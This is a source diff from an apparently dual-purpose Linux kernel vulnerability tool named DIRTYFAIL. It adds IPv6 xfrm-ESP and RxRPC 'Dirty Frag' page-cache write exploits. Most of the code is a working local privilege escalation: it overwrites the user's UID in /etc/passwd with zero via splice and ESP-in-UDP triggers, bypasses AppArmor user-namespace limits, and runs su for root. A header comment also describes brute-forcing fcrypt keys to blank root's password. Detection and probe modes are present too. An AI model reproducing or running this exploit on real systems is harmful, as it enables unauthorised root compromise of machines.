usa->sel.family = AF_INET6; + usa->sel.prefixlen_d = 128; + usa->sel.prefixlen_s = 128; + + memcpy(&usa->id.daddr.a6, &loop6, 16); + usa->id.spi = htonl(ESP_SPI); + usa->id.proto = IPPROTO_ESP; + + memcpy(&usa->saddr.a6, &loop6, 16); + + usa->lft.soft_byte_limit = (uint64_t)-1; + usa->lft.hard_byte_limit = (uint64_t)-1; + usa->lft.soft_packet_limit = (uint64_t)-1; + usa->lft.hard_packet_limit = (uint64_t)-1; + + usa->reqid = 0x1234; + usa->family = AF_INET6; /* <-- v6 */ + usa->mode = XFRM_MODE_TRANSPORT; + usa->replay_window = 0; /* SA-level: 0; ESN-level (below): 32 */ + usa->flags = XFRM_STATE_ESN; + + size_t hdrlen = sizeof(*nlh) + sizeof(*usa); + size_t attrs = 0; + char *abuf = buf + hdrlen; + + /* + * Same authencesn-as-composition story as the v4 path β€” see the + * comment block in dirtyfrag_esp.c::xfrm_register_sa for why we + * register two separate attributes instead of XFRMA_ALG_AEAD. + */ + { /* XFRMA_ALG_AUTH_TRUNC */ + struct xfrm_algo_auth *aa; + unsigned short dlen = sizeof(*aa) + 32; + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ALG_AUTH_TRUNC; + r->rta_len = RTA_LENGTH(dlen); + aa = (struct xfrm_algo_auth *)RTA_DATA(r); + memset(aa, 0, dlen); + strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name) - 1); + aa->alg_key_len = 32 * 8; + aa->alg_trunc_len = 128; + attrs += RTA_SPACE(dlen); + } + { /* XFRMA_ALG_CRYPT */ + struct xfrm_algo *ea; + unsigned short dlen = sizeof(*ea) + 16; + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ALG_CRYPT; + r->rta_len = RTA_LENGTH(dlen); + ea = (struct xfrm_algo *)RTA_DATA(r); + memset(ea, 0, dlen); + strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name) - 1); + ea->alg_key_len = 16 * 8; + attrs += RTA_SPACE(dlen); + } + { /* XFRMA_REPLAY_ESN_VAL β€” same primitive input as v4 */ + struct xfrm_replay_state_esn *esn; + unsigned short dlen = sizeof(*esn) + 4; + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_REPLAY_ESN_VAL; + r->rta_len = RTA_LENGTH(dlen); + esn = (struct xfrm_replay_state_esn *)RTA_DATA(r); + memset(esn, 0, dlen); + esn->bmp_len = 1; + esn->seq = 100; + memcpy(&esn->seq_hi, seq_hi, 4); + esn->replay_window = 32; + attrs += RTA_SPACE(dlen); + } + { /* XFRMA_ENCAP β€” UDP/4500 */ + struct xfrm_encap_tmpl *enc; + unsigned short dlen = sizeof(*enc); + struct rtattr *r = (struct rtattr *)(abuf + attrs); + r->rta_type = XFRMA_ENCAP; + r->rta_len = RTA_LENGTH(dlen); + enc = (struct xfrm_encap_tmpl *)RTA_DATA(r); + memset(enc, 0, dlen); + enc->encap_type = UDP_ENCAP_ESPINUDP; + enc->encap_sport = htons(ENCAP_PORT); + enc->encap_dport = htons(ENCAP_PORT); + attrs += RTA_SPACE(dlen); + } + + nlh->nlmsg_len = hdrlen + attrs; + + struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK }; + if (sendto(nl, buf, nlh->nlmsg_len, 0, + (struct sockaddr *)&nladdr, sizeof(nladdr)) < 0) + return false; + + char ack[4096]; + ssize_t n = recv(nl, ack, sizeof(ack), 0); + if (n < (ssize_t)sizeof(struct nlmsghdr)) return false; + struct nlmsghdr *r = (struct nlmsghdr *)ack; + if (r->nlmsg_type == NLMSG_ERROR) { + struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(r); + if (e->error != 0) { + log_bad("XFRM_MSG_NEWSA(v6): %s", strerror(-e->error)); + return false; + } + } + return true; +} + +static bool bring_lo_up_v6(void) +{ + int s = socket(AF_INET6, SOCK_DGRAM, 0); + if (s < 0) return false; + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + ifr.ifr_flags = IFF_UP | IFF_RUNNING; + int rc = ioctl(s, SIOCSIFFLAGS, &ifr); + close(s); + return rc == 0; +} + +/* Generalized v6 trigger: splice from `target_path` at `splice_off`, + * len 16 bytes. The STORE lands at file_offset (splice_off + shift) + * where `shift` is empirically determined per-kernel (see + * calibrate_v6_shift below). Use this directly if you already know + * the shift; for the production exploit path, callers go through + * trigger_store_v6() which compensates automatically. */ +static bool trigger_store_v6_at(const char *target_path, loff_t splice_off) +{ + int udp_recv = socket(AF_INET6, SOCK_DGRAM, 0); + if (udp_recv < 0) return false; + struct sockaddr_in6 addr; + memset(&addr, 0, sizeof(addr)); + addr.sin6_family = AF_INET6; + addr.sin6_port = htons(ENCAP_PORT); + addr.sin6_addr = in6addr_loopback; + + int reuse = 1; + setsockopt(udp_recv, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse)); + if (bind(udp_recv, (struct sockaddr *)&addr, sizeof(addr)) < 0) { + log_bad("bind v6 udp_recv: %s", strerror(errno)); + close(udp_recv); return false; + } + int encap = UDP_ENCAP_ESPINUDP; + if (setsockopt(udp_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) { + log_bad("UDP_ENCAP v6: %s", strerror(errno)); + close(udp_recv); return false; + } + + int udp_send = socket(AF_INET6, SOCK_DGRAM, 0); + if (udp_send < 0) { close(udp_recv); return false; } + if (connect(udp_send, (struct sockaddr *)&addr, sizeof(addr)) < 0) { + log_bad("connect v6 udp_send: %s", strerror(errno)); + close(udp_recv); close(udp_send); return false; + } + + /* Wire ESP header (24B) β€” same as v4. */ + unsigned char wire_hdr[24]; + *(uint32_t *)(wire_hdr + 0) = htonl(ESP_SPI); + *(uint32_t *)(wire_hdr + 4) = htonl(101); + memset(wire_hdr + 8, 0xCC, 16); + + /* v6 padding to clear the size gate. */ + unsigned char pad[V6_PAD_BYTES] = {0}; + + int pfd = open(target_path, O_RDONLY); + if (pfd < 0) { + log_bad("open %s: %s", target_path, strerror(errno)); + close(udp_recv); close(udp_send); return false; + } + + int p[2]; + if (pipe(p) < 0) { + log_bad("pipe: %s", strerror(errno)); + close(pfd); close(udp_recv); close(udp_send); return false; + } + + /* Compose: hdr(24) || target@off(16) || pad(V6_PAD_BYTES) */ + struct iovec iov_hdr = { .iov_base = wire_hdr, .iov_len = sizeof(wire_hdr) }; + if (vmsplice(p[1], &iov_hdr, 1, 0) != (ssize_t)sizeof(wire_hdr)) { + log_bad("vmsplice hdr: %s", strerror(errno)); + goto fail; + } + { + loff_t off = splice_off; + if (splice(pfd, &off, p[1], NULL, 16, SPLICE_F_MOVE) != 16) { + log_bad("splice file->pipe: %s", strerror(errno)); + goto fail; + } + } + { + struct iovec iov_pad = { .iov_base = pad, .iov_len = V6_PAD_BYTES }; + if (vmsplice(p[1], &iov_pad, 1, 0) != V6_PAD_BYTES) { + log_bad("vmsplice pad: %s", strerror(errno)); + goto fail; + } + } + if (splice(p[0], NULL, udp_send, NULL, + 24 + 16 + V6_PAD_BYTES, SPLICE_F_MOVE) + != 24 + 16 + V6_PAD_BYTES) { + log_bad("splice pipe->udp v6: %s", strerror(errno)); + goto fail; + } + close(p[0]); close(p[1]); + + /* See the comment in dirtyfrag_esp.c::trigger_store on why we + * need to wait before tearing down sockets. */ + usleep(150 * 1000); + unsigned char drain[256]; + (void)recv(udp_recv, drain, sizeof(drain), MSG_DONTWAIT); + + close(pfd); close(udp_recv); close(udp_send); + return true; + +fail: + close(p[0]); close(p[1]); + close(pfd); close(udp_recv); close(udp_send); + return false; +} + +/* Calibrate V6_STORE_SHIFT empirically against a sentinel file in /tmp. + * + * We fire the v6 trigger once with marker bytes "0000" spliced from + * sentinel offset 0, then re-read the sentinel and find where "0000" + * landed. The offset is the kernel's STORE shift for this build of + * esp6_input. Caller then splices from `uid_off - shift` for the real + * exploit so the STORE lands exactly at uid_off. + * + * Returns shift in [0, 64) on success, or -1 if the marker didn't land + * at all (kernel may be patched, or trigger setup failed). */ +static int calibrate_v6_shift(void) +{ + /* Build a 4 KiB sentinel filled with a recognizable pattern that + * cannot collide with our marker "0000". We use ASCII 'A' bytes. */ + char tmpl[] = "/tmp/dirtyfail-v6-cal.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { log_bad("calibration: mkstemp: %s", strerror(errno)); return -1; } + unsigned char filler[4096]; + memset(filler, 'A', sizeof(filler)); + if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { + close(sfd); unlink(tmpl); return -1; + } + close(sfd); + + /* Fault the page in. */ + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return -1; } + char tmp[4096]; + if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { + close(rfd); unlink(tmpl); return -1; + } + close(rfd); + + /* Fire the trigger from sentinel offset 0. The trigger's wire + * packet carries seq_hi="0000" (MARKER), so the STORE writes those + * 4 bytes somewhere in the sentinel page. */ + bool ok = trigger_store_v6_at(tmpl, 0); + if (!ok) { + log_bad("calibration: v6 trigger failed"); + unlink(tmpl); + return -1; + } + + /* Re-read the sentinel via a fresh fd (page-cache view, not disk). */ + rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return -1; } + unsigned char after[64]; + ssize_t got = read(rfd, after, sizeof(after)); + close(rfd); + unlink(tmpl); + if (got <= 0) return -1; + + /* Search the first 64 bytes for the marker. We expect it to land + * within ~32 bytes of offset 0 based on prior empirical tests. */ + for (int i = 0; i + 4 <= got; i++) { + if (memcmp(after + i, MARKER, 4) == 0) { + log_ok("v6 calibration: STORE landed at sentinel offset %d", i); + return i; + } + } + log_warn("v6 calibration: marker '%s' did not land in sentinel β€” " + "kernel may be patched, or trigger didn't fire", MARKER); + return -1; +} + +/* Production v6 trigger: calibrates the shift on first call, then + * splices from passwd_off - shift so the STORE lands at passwd_off. */ +static int g_v6_shift = -1; /* lazy-init by trigger_store_v6 */ + +static bool trigger_store_v6(off_t passwd_off) +{ + if (g_v6_shift < 0) { + g_v6_shift = calibrate_v6_shift(); + if (g_v6_shift < 0) { + log_warn("v6 calibration failed; falling back to hard-coded " + "V6_STORE_SHIFT=%d (may be wrong for this kernel)", + V6_STORE_SHIFT); + g_v6_shift = V6_STORE_SHIFT; + } + } + loff_t off = (passwd_off >= g_v6_shift) ? passwd_off - g_v6_shift : 0; + return trigger_store_v6_at("/etc/passwd", off); +} + +__attribute__((unused)) + +static int run_v6_in_userns(off_t passwd_off, uid_t real_uid, gid_t real_gid) +{ + if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) != 0) { + log_bad("unshare v6: %s", strerror(errno)); + return 1; + } + wproc("/proc/self/setgroups", "deny"); + char m[64]; + snprintf(m, sizeof(m), "0 %u 1", (unsigned)real_uid); + wproc("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %u 1", (unsigned)real_gid); + wproc("/proc/self/gid_map", m); + if (!bring_lo_up_v6()) { + log_bad("bring lo up (v6): %s", strerror(errno)); + return 1; + } + + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { log_bad("netlink xfrm: %s", strerror(errno)); return 1; } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("bind netlink: %s", strerror(errno)); + close(nl); return 1; + } + + if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); return 1; + } + log_ok("v6 XFRM SA registered with seq_hi='%s'", MARKER); + + if (!trigger_store_v6(passwd_off)) { close(nl); return 1; } + log_ok("v6 ESP-in-UDP trigger fired"); + + close(nl); + return 0; +} + +#else +__attribute__((unused)) +static int run_v6_in_userns(off_t a, uid_t b, gid_t c) { + (void)a; (void)b; (void)c; return 1; +} +#endif + +/* INNER (bypass userns): SA reg + trigger only. */ +df_result_t dirtyfrag_esp6_exploit_inner(void) +{ +#ifdef __linux__ + const char *user = getenv("DIRTYFAIL_TARGET_USER"); + if (!user || !*user) { + log_bad("inner: DIRTYFAIL_TARGET_USER not set"); + return DF_TEST_ERROR; + } + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("inner: find_passwd_uid_field('%s') failed", user); + return DF_TEST_ERROR; + } + if (uid_len != 4) { + log_bad("inner: UID '%s' not 4 chars", uid_str); + return DF_TEST_ERROR; + } + + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { log_bad("inner: netlink xfrm: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("inner: bind netlink: %s", strerror(errno)); + close(nl); return DF_EXPLOIT_FAIL; + } + if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); return DF_EXPLOIT_FAIL; + } + log_ok("inner: v6 XFRM SA registered with seq_hi='%s'", MARKER); + if (!trigger_store_v6(uid_off)) { close(nl); return DF_EXPLOIT_FAIL; } + log_ok("inner: v6 ESP-in-UDP trigger fired at uid_off=%lld", (long long)uid_off); + close(nl); + return DF_EXPLOIT_OK; +#else + return DF_TEST_ERROR; +#endif +} + +/* OUTER (init ns): prompts β†’ fork bypass child β†’ wait β†’ verify β†’ su. */ +df_result_t dirtyfrag_esp6_exploit(bool do_shell) +{ + log_step("Dirty Frag (IPv6 xfrm-ESP) β€” exploit"); + + uid_t uid = getuid(); + if (uid == 0) { + log_warn("already root in init namespace β€” nothing to escalate"); + return DF_OK; + } + struct passwd *pw = getpwuid(uid); + if (!pw) { log_bad("getpwuid: %s", strerror(errno)); return DF_TEST_ERROR; } + const char *user = pw->pw_name; + + off_t uid_off; size_t uid_len; char uid_str[16]; + if (!find_passwd_uid_field(user, &uid_off, &uid_len, uid_str)) { + log_bad("could not find %s in /etc/passwd", user); + return DF_TEST_ERROR; + } + log_step("/etc/passwd UID for %s: '%s' at offset %lld", + user, uid_str, (long long)uid_off); + if (uid_len != 4) { + log_bad("UID '%s' is %zu chars; need 4", uid_str, uid_len); + return DF_TEST_ERROR; + } + + log_warn("about to run xfrm-ESP6 page-cache write against /etc/passwd"); + log_warn("over ::1 with %d-byte padding to clear xfrm6_input size gate", + V6_PAD_BYTES); + if (!typed_confirm("DIRTYFAIL")) { log_bad("confirmation declined"); return DF_OK; } + if (!ssh_lockout_check(user)) { log_bad("ssh-lockout declined"); return DF_OK; } + + setenv("DIRTYFAIL_INNER_MODE", "esp6", 1); + setenv("DIRTYFAIL_TARGET_USER", user, 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); + if (rc != DF_EXPLOIT_OK) { + log_bad("inner exploit failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + int v = open("/etc/passwd", O_RDONLY); + if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } + if (lseek(v, uid_off, SEEK_SET) != uid_off) { close(v); return DF_EXPLOIT_FAIL; } + char land[5] = {0}; + if (read(v, land, 4) != 4) { close(v); return DF_EXPLOIT_FAIL; } + close(v); + if (memcmp(land, MARKER, 4) != 0) { + log_bad("v6 write did not land β€” page cache reads '%.4s'", land); + return DF_EXPLOIT_FAIL; + } + log_ok("page cache now reports %s with uid 0 (via v6 path)", user); + + if (!do_shell) { + if (try_revert_passwd_page_cache()) + log_ok("page cache reverted (--no-shell)"); + else + log_warn("page cache may still be modified β€” `sudo dirtyfail --cleanup` or reboot"); + return DF_EXPLOIT_OK; + } + + log_ok("invoking 'su %s' in init namespace β€” enter your password for REAL root", user); + execlp("su", "su", user, (char *)NULL); + log_bad("execlp: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} + +/* ---------------------------------------------------------------- * + * Active probe β€” used by `--scan --active`. + * + * Same shape as the v4 active probe: registers an SA in a fresh + * userns and fires the trigger against a sentinel /tmp file. The + * parent re-reads the sentinel and looks for the marker. + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_esp6_active_probe_inner(void) +{ +#ifdef __linux__ + const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL"); + if (!sentinel || !*sentinel) { + log_bad("active-probe v6: DIRTYFAIL_PROBE_SENTINEL not set"); + return DF_TEST_ERROR; + } + if (!bring_lo_up_v6()) { + log_bad("active-probe v6: bring lo up: %s", strerror(errno)); + return DF_TEST_ERROR; + } + int nl = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM); + if (nl < 0) { + log_bad("active-probe v6: netlink xfrm: %s", strerror(errno)); + return DF_TEST_ERROR; + } + struct sockaddr_nl nla = { .nl_family = AF_NETLINK }; + if (bind(nl, (struct sockaddr *)&nla, sizeof(nla)) < 0) { + log_bad("active-probe v6: bind netlink: %s", strerror(errno)); + close(nl); return DF_TEST_ERROR; + } + if (!xfrm6_register_sa(nl, (const unsigned char *)MARKER)) { + close(nl); return DF_TEST_ERROR; + } + /* Splice from sentinel offset 0; we don't need uid_off math here. */ + if (!trigger_store_v6_at(sentinel, 0)) { + close(nl); return DF_TEST_ERROR; + } + close(nl); + return DF_EXPLOIT_OK; +#else + return DF_TEST_ERROR; +#endif +} + +df_result_t dirtyfrag_esp6_active_probe(void) +{ + char tmpl[] = "/tmp/dirtyfail-esp6-probe.XXXXXX"; + int sfd = mkstemp(tmpl); + if (sfd < 0) { log_bad("probe v6 mkstemp: %s", strerror(errno)); return DF_TEST_ERROR; } + unsigned char filler[4096]; + memset(filler, 'A', sizeof(filler)); + if (write(sfd, filler, sizeof(filler)) != (ssize_t)sizeof(filler)) { + close(sfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(sfd); + + int rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + char tmp[4096]; + if (read(rfd, tmp, sizeof(tmp)) != (ssize_t)sizeof(tmp)) { + close(rfd); unlink(tmpl); return DF_TEST_ERROR; + } + close(rfd); + + setenv("DIRTYFAIL_INNER_MODE", "esp6-probe", 1); + setenv("DIRTYFAIL_PROBE_SENTINEL", tmpl, 1); + int rc = apparmor_bypass_fork_arm(0, NULL); + unsetenv("DIRTYFAIL_INNER_MODE"); + unsetenv("DIRTYFAIL_PROBE_SENTINEL"); + + if (rc == DF_PRECOND_FAIL) { unlink(tmpl); return DF_PRECOND_FAIL; } + if (rc != DF_EXPLOIT_OK) { + log_bad("active-probe v6 inner failed (exit=%d)", rc); + unlink(tmpl); return DF_TEST_ERROR; + } + + rfd = open(tmpl, O_RDONLY); + if (rfd < 0) { unlink(tmpl); return DF_TEST_ERROR; } + unsigned char after[64]; + ssize_t got = read(rfd, after, sizeof(after)); + close(rfd); + unlink(tmpl); + if (got <= 0) return DF_TEST_ERROR; + + for (int i = 0; i + 4 <= got; i++) { + if (memcmp(after + i, MARKER, 4) == 0) { + log_warn("ACTIVE PROBE v6: STORE landed at offset %d β†’ kernel is VULNERABLE", i); + return DF_VULNERABLE; + } + } + log_ok("ACTIVE PROBE v6: page intact β€” kernel esp6 path appears patched"); + return DF_OK; +} diff --git a/modules/copy_fail_family/dirtyfrag_esp6.h b/modules/copy_fail_family/dirtyfrag_esp6.h new file mode 100644 index 0000000..0e1a1fb --- /dev/null +++ b/modules/copy_fail_family/dirtyfrag_esp6.h @@ -0,0 +1,46 @@ +/* + * DIRTYFAIL β€” dirtyfrag_esp6.h + * + * IPv6 dual of the xfrm-ESP page-cache write (CVE-2026-43284). + * + * `esp6_input()` carries the same `if (!skb_has_frag_list(skb)) goto + * skip_cow` branch as `esp_input()`. The mainline patch + * f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4 covers BOTH v4 and v6, + * but some distro backports may have shipped only the v4 fix β€” + * particularly when they cherry-picked the ipv4 patch in isolation. + * + * A vulnerable system in the wild may therefore be: + * - patched on v4, vulnerable on v6 + * - patched on v6, vulnerable on v4 + * - vulnerable on both + * + * This module is the v6 detector + exploit. Differences from the v4 + * path: + * - AF_INET6 sockets, ::1 source/dest, sockaddr_in6 + * - XFRM SA registered with family=AF_INET6 and 16-byte addresses + * - ESP packet padded to >= 48 bytes total to clear the + * `xfrm6_input.c` size gate (which v4 does not have) + */ + +#ifndef DIRTYFAIL_DIRTYFRAG_ESP6_H +#define DIRTYFAIL_DIRTYFRAG_ESP6_H + +#include "common.h" + +df_result_t dirtyfrag_esp6_detect(void); + +/* OUTER (init ns): prompts β†’ fork β†’ wait β†’ verify β†’ su. + * INNER (bypass userns): SA reg + trigger only. */ +df_result_t dirtyfrag_esp6_exploit(bool do_shell); +df_result_t dirtyfrag_esp6_exploit_inner(void); + +/* Active probe: fires the v6 ESP-in-UDP trigger against a /tmp sentinel + * file (never /etc/passwd) and reports whether the marker landed. + * Used by `--scan --active`. Returns DF_VULNERABLE on marker hit, DF_OK + * if the kernel is patched (no STORE), DF_PRECOND_FAIL if AA-blocked. + * The inner half runs in the bypass userns and reads + * DIRTYFAIL_PROBE_SENTINEL for the target path. */ +df_result_t dirtyfrag_esp6_active_probe(void); +df_result_t dirtyfrag_esp6_active_probe_inner(void); + +#endif diff --git a/modules/copy_fail_family/dirtyfrag_rxrpc.c b/modules/copy_fail_family/dirtyfrag_rxrpc.c new file mode 100644 index 0000000..98f124e --- /dev/null +++ b/modules/copy_fail_family/dirtyfrag_rxrpc.c @@ -0,0 +1,1069 @@ +/* + * DIRTYFAIL β€” dirtyfrag_rxrpc.c β€” Dirty Frag RxRPC variant + * CVE-2026-43500 + * + * BACKGROUND + * ---------- + * `rxkad_verify_packet_1()` decrypts the first 8 bytes of an RxRPC + * data packet in-place via `pcbc(fcrypt)`. With `splice()` planting a + * page-cache page into the skb's frag, the in-place decrypt lands an + * 8-byte STORE on top of that page. + * + * The 8 STOREd bytes are `pcbc_decrypt(C, K)` where C is the existing + * 8 bytes at the file offset and K is an attacker-controlled 8-byte + * session key from an RxRPC v1 token registered via `add_key("rxrpc", + * ...)`. With a single block and IV = 0, pcbc reduces to a plain + * fcrypt_decrypt(C, K), which is a 56-bit-key cipher β€” small enough + * to brute-force in user space until the desired plaintext drops out. + * + * Unlike xfrm-ESP (CVE-2026-43284), this path needs no namespace + * privilege β€” `add_key`, `socket(AF_RXRPC)`, `socket(AF_ALG)`, and + * `splice` are all available to unprivileged users on a stock build + * with rxrpc.ko present (which Ubuntu ships by default). + * + * EXPLOIT TARGET + * -------------- + * /etc/passwd line 1 ("root:x:0:0:..."). Three 8-byte STOREs at + * offsets 4, 6, 8 with last-write-wins reshape chars 4..15 into + * "::0:0:GGGGGG:" β€” empty password field for root. PAM + * `pam_unix.so nullok` then accepts a missing password, su drops + * a root shell. + * + * file off: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 + * original: r o o t : x : 0 : 0 : r o o t : + * final: r o o t : : 0 : 0 : G G G G G : + * + * Splice A @ 4 (8B): bytes 4..11 = P_A want P_A[0..1] = "::" + * Splice B @ 6 (8B): bytes 6..13 = P_B want P_B[0..1] = "0:" + * Splice C @ 8 (8B): bytes 8..15 = P_C want P_C[0..1] = "0:", + * P_C[2..6] βˆ‰ {':' '\\0' '\\n'}, + * P_C[7] = ":" + * + * Chained-ciphertext correction: by the time splice B runs, the page + * at offsets 6..11 has already been overwritten by splice A. So the + * ciphertext fcrypt sees for K_B is `P_A[2..7] || original_C[6..7]` + * (the last 2 bytes of the splice region are still original passwd + * bytes 12..13). Same logic for K_C against P_B. We compute these + * actual ciphertexts before each brute force. + * + * BRUTE-FORCE COST (single core, ~18 Mops/s): + * K_A: 2 fully-fixed bytes β‡’ ~2^16 iters β‡’ ~3 ms + * K_B: 2 fully-fixed bytes β‡’ ~2^16 iters β‡’ ~3 ms + * K_C: 3 fixed + 5 weak constraints β‡’ ~2^24 iters β‡’ ~1 s + */ + +#include "dirtyfrag_rxrpc.h" +#include "fcrypt.h" +#include "apparmor_bypass.h" + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#ifdef __linux__ +#include +#include +#include +#include +#include +#else +/* macOS analysis stubs only β€” real binary runs on Linux. */ +#define IFNAMSIZ 16 +#define IFF_UP 0x01 +#define IFF_RUNNING 0x40 +#define SIOCGIFFLAGS 0x8913 +#define SIOCSIFFLAGS 0x8914 +#define KEY_SPEC_PROCESS_KEYRING (-2) +#define CLONE_NEWUSER 0x10000000 +#define CLONE_NEWNET 0x40000000 +#define SYS_unshare 0 +#define SYS_add_key 0 +struct ifreq { char ifr_name[IFNAMSIZ]; short ifr_flags; }; +typedef int loff_t; +__attribute__((unused)) +static inline ssize_t splice (int a, loff_t *b, int c, loff_t *d, + size_t e, unsigned f) { + (void)a;(void)b;(void)c;(void)d;(void)e;(void)f; return -1; } +__attribute__((unused)) +static inline ssize_t vmsplice(int a, const struct iovec *b, unsigned long c, + unsigned d) { + (void)a;(void)b;(void)c;(void)d; return -1; } +#endif + +/* ---------------------------------------------------------------- * + * RxRPC / rxkad / AF_ALG fallback constants + * + * may not be present on all distros. Define what we + * need locally so DIRTYFAIL compiles on any modern Linux toolchain. + * ---------------------------------------------------------------- */ + +#ifndef AF_RXRPC +#define AF_RXRPC 33 +#endif +#ifndef PF_RXRPC +#define PF_RXRPC AF_RXRPC +#endif +#ifndef SOL_RXRPC +#define SOL_RXRPC 272 +#endif +#ifndef RXRPC_SECURITY_KEY +#define RXRPC_SECURITY_KEY 1 +#define RXRPC_MIN_SECURITY_LEVEL 4 +#define RXRPC_USER_CALL_ID 1 +#define RXRPC_SECURITY_AUTH 1 +#endif + +/* RxRPC packet header (28 bytes, network byte order on the wire). */ +struct rxrpc_wire_hdr { + uint32_t epoch; + uint32_t cid; + uint32_t callNumber; + uint32_t seq; + uint32_t serial; + uint8_t type; + uint8_t flags; + uint8_t userStatus; + uint8_t securityIndex; + uint16_t cksum; /* big-endian on wire */ + uint16_t serviceId; +} __attribute__((packed)); + +#define RXRPC_PKT_DATA 1 +#define RXRPC_PKT_CHALLENGE 6 +#define RXRPC_LAST_PACKET 0x04 +#define RXRPC_CHANNELMASK 3 +#define RXRPC_CIDSHIFT 2 + +struct rxkad_challenge_payload { + uint32_t version; + uint32_t nonce; + uint32_t min_level; + uint32_t __padding; +} __attribute__((packed)); + +/* sockaddr_rxrpc is in ; fallback below. + * + * IMPORTANT: the kernel's struct sockaddr_rxrpc has the transport union + * sized to include sockaddr_in6 (28 B), making the total 36 B. The + * rxrpc_bind() syscall rejects with -EINVAL if len < sizeof(struct + * sockaddr_rxrpc), so even when we only use the v4 path we MUST send + * 36 bytes β€” hence the in6 member below. */ +struct dfr_sockaddr_rxrpc { + uint16_t srx_family; + uint16_t srx_service; + uint16_t transport_type; + uint16_t transport_len; + union { + uint16_t family; + struct sockaddr_in sin; + struct sockaddr_in6 sin6; + } transport; +}; + +/* AF_ALG IV control message header. */ +struct dfr_af_alg_iv { + uint32_t ivlen; + uint8_t iv[8]; +} __attribute__((packed)); + +/* ---------------------------------------------------------------- * + * Detection (precondition probe β€” unchanged from earlier version) + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_rxrpc_detect(void) +{ + log_step("Dirty Frag β€” RxRPC variant (CVE-2026-43500) β€” detection"); + + int km = -1, kn = -1; + if (kernel_version(&km, &kn)) + log_hint("kernel %d.%d.x", km, kn); + + bool rxrpc = kmod_loaded("rxrpc"); + log_hint("rxrpc currently loaded: %s", rxrpc ? "yes" : "no"); + + int s = socket(AF_RXRPC, SOCK_DGRAM, 0); + bool can_open = (s >= 0); + if (can_open) close(s); + log_hint("AF_RXRPC socket: %s", can_open ? "openable" : "denied"); + + if (!rxrpc && !can_open) { + log_ok("rxrpc not present and AF_RXRPC socket family rejected β€” " + "RxRPC variant unreachable"); + return DF_PRECOND_FAIL; + } + + /* The RxRPC trigger needs to register an rxrpc key + open AF_RXRPC + * socket inside a userns with caps. If caps are stripped, fail out. */ + if (apparmor_userns_caps_blocked()) { + log_ok("LSM-mitigated β€” unprivileged userns has no caps, RxRPC trigger " + "cannot register session keys or open AF_RXRPC."); + return DF_PRECOND_FAIL; + } + + if (dirtyfail_active_probes) { + log_step("--active set: firing rxkad handshake-forgery trigger against /tmp sentinel"); + df_result_t pr = dirtyfrag_rxrpc_active_probe(); + if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr; + log_warn("active probe inconclusive β€” falling back to precondition verdict"); + } + + log_warn("VULNERABLE β€” RxRPC variant of Dirty Frag is reachable"); + log_warn("apply mitigation: `dirtyfail --mitigate` (blacklists rxrpc + others)"); + log_warn("or manually: blacklist rxrpc + drop_caches"); + log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe"); + return DF_VULNERABLE; +} + +/* ================================================================ * + * Exploit (Linux-only; macOS gets a stub at the bottom). + * ================================================================ */ + +#ifdef __linux__ + +extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, + loff_t *off_out, size_t len, unsigned int flags); +extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr, + unsigned int flags); + +/* ---- /proc helpers --------------------------------------------------- */ + +static bool write_proc_str(const char *path, const char *value) +{ + int fd = open(path, O_WRONLY); + if (fd < 0) return false; + ssize_t want = (ssize_t)strlen(value); + ssize_t got = write(fd, value, want); + close(fd); + return got == want; +} + +/* ---- userns / netns setup ------------------------------------------- */ + +__attribute__((unused)) +static bool setup_userns(uid_t real_uid, gid_t real_gid) +{ + if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) < 0) { + log_bad("unshare(USER|NET): %s", strerror(errno)); 